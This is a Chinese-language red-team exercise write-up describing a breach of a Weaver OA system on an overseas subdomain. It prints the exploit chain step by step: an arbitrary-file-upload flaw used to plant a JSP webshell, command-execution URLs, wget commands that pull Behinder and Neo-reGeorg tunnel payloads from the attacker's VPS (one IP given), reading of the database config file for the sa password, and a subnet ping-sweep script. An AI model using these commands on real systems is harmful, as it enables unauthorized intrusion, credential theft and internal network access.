記某次攻防演練實戰
0x01 資訊收集 前期進行相關的資訊收集工作,發現主站的防護很嚴格,爆破被鎖,批量測試工具會被ban ip,難度很大心态有點崩。
子域名枚舉,通路後發現是一個業務系統,IP定位是某海外IP。原來該公司有海外業務,終于找到了一個相對的邊緣資産。通路該系統的網站首頁,對登入框進行測試: 抓登入包進行測試,随便輸入賬号密碼之後提示License送出頁面:測試檔案上傳功能點:發現cookie頭中包含ecology_JSession字段名,驗證該指紋是泛微OA應用。
0x02 web打點 用泛微OA的EXP進行測試相關漏洞:
測試出泛微OA weaver.common.Ctrl任意檔案上傳漏洞,上傳了一句話jsp。
手工測試該一句話jsp:http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=whoami發現可以進行指令執行,目标系統為linux。
判斷目标機器是否出網:目标機器嘗試ping 我的VPS:VPS上監聽80端口,目标機器嘗試與80端口通信。發現目标機器可以與我的VPS通信。
0x03 建立據點
1、嘗試使用webshell管理目标: 生成冰蠍的jsp webshell,嘗試将冰蠍馬落到目标機器上。http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ping X.X.X.X -c 4http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wgethttp://X.X.X.X
(1) 确定網站的絕對路徑: 絕對路徑為:/data/bdip/weaver/ecology/
(2) VSP啟臨時web服務釋出webshell,目标機器執行下載下傳指令: 确認冰蠍馬落到目标機器的網站絕對路徑下
。http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=pwdhttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology/ http://X.X.X.X/x.jsp使用冰蠍連接配接對應的webshell,連接配接成功:
2、使用http_tunnel管理目标
(1) 使用Neo-reGeorg工具生成http tunnel的jsp: python3 neoreg.py generate -k xxxx
(2) 下載下傳tunnel.jsp馬到目标機器上: 确認tunnel.jsp檔案落到目标機器根目錄上。
(3) 在VPS上連接配接http tunnel jsp: http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=wget -P /data/bdip/weaver/ecology http://149.28.22.33/xx.jsppython3 neoreg.py -u http://X.X.X.X/tunnel.jsp -k xxx -p 1001
(4) 通過proxychains代理工具測試驗證通路目标内網:
0x04 目前落腳點機器資訊收集
1、尋找泛微OA連接配接資料庫配置檔案:
2、檢視連接配接資料庫的配置檔案: 發現是MSSQL資料庫,且資料庫服務在本地開啟。
3、檢視資料庫中的資料: 拿到sa使用者的密碼使用冰蠍去連接配接資料庫,可以看到對應庫中的資料:
http://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=ls -lrth /data/bdip/weaver/ecology/WEB-INF/prop/weaver.propertieshttp://X.X.X.X/cloudstore/GyBtVQDJ.jsp?cmd=cat /data/bdip/weaver/ecology/WEB-INF/prop/weaver.properties
0x05 内網資訊收集 1、檢視目前機器的IP及同網段的主機IP:
2、探測目前網段存活主機:由于socks5代理無法代理ping流量。是以在VPS上準備一個ping.sh腳本,臨時開啟http服務。#!/bin/bashfor i in {1..254} do
ping -c2 -i0.3 -W1 X.X.X.$i &>/dev/null
if [ $? -eq 0 ];then
echo "X.X.X.$i is up" else
echo "X.X.X.$i is down"
fidone目标機器主動将ping.sh腳本下載下傳到/opt目錄下:
給ping.sh腳本賦予可執行權限:
運作ping.sh腳本将探活結果寫到檔案裡:檢視掃描結果除了落腳點這台機器,竟然目前網段隻有1台機器存活。
存活機器大機率是網關,沒有其他可以橫向移動的機器了。
查了下hosts檔案發現是雲某雲主機,結束
首發tools by geo